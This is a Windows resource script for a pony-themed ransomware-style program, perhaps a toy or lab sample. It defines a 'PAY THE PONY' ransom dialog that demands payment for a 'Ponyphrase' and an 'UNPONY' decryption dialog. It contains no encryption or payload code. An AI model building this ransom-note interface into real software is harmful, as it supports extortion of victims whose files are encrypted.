#include <Windows.h>
#include <CommCtrl.h>
#include <Richedit.h>

#include "resource.h"

IDR_ICON1  ICON  "..\\..\\resources\\mlp.ico"

//
// Bitmap resources
//
LANGUAGE 0, SUBLANG_NEUTRAL
IDB_BITMAP1        BITMAP         "..\\..\\resources\\ponymad.bmp"

//
// Dialog resources
//
IDD_DIALOG1 DIALOG 0, 0, 247, 160
STYLE DS_3DLOOK | DS_CENTER | DS_MODALFRAME | DS_SHELLFONT | WS_CAPTION | WS_VISIBLE | WS_POPUP | WS_SYSMENU
CAPTION "PAY THE PONY"
FONT 8, "Ms Shell Dlg"
{
    CONTROL         IDB_BITMAP1, 0, WC_STATIC, SS_BITMAP, 31, 5, 184, 73, WS_EX_LEFT
    CTEXT           "This file belongs to the pony! You must pay the pony to get it back!", 20001, 19, 84, 210, 8, SS_CENTER, WS_EX_LEFT
    PUSHBUTTON      "Click to pay the pony and get your Ponyphrase!", IDMYACTION, 49, 95, 160, 20, WS_EX_LEFT
    EDITTEXT        IDMYPASS, 87, 122, 117, 12, ES_AUTOHSCROLL | ES_PASSWORD, WS_EX_LEFT
    LTEXT           "Ponyphrase:", 20000, 42, 123, 40, 8, SS_LEFT, WS_EX_LEFT
    PUSHBUTTON      "Cancel", IDCANCEL, 126, 142, 50, 14, 0, WS_EX_LEFT
    DEFPUSHBUTTON   "OK", IDOK, 71, 142, 50, 14, 0, WS_EX_LEFT
}

IDD_DIALOG2 DIALOG 0, 0, 284, 94
STYLE DS_3DLOOK | DS_CENTER | DS_MODALFRAME | DS_SHELLFONT | WS_CAPTION | WS_VISIBLE | WS_POPUP | WS_SYSMENU
CAPTION "UNPONY"
FONT 8, "Ms Shell Dlg"
{
    CTEXT           "Decrypting file...", 0, 116, 15, 52, 8, SS_CENTER, WS_EX_LEFT
		PUSHBUTTON      "Cancel", IDCANCEL, 117, 77, 51, 14, 0, WS_EX_LEFT
}
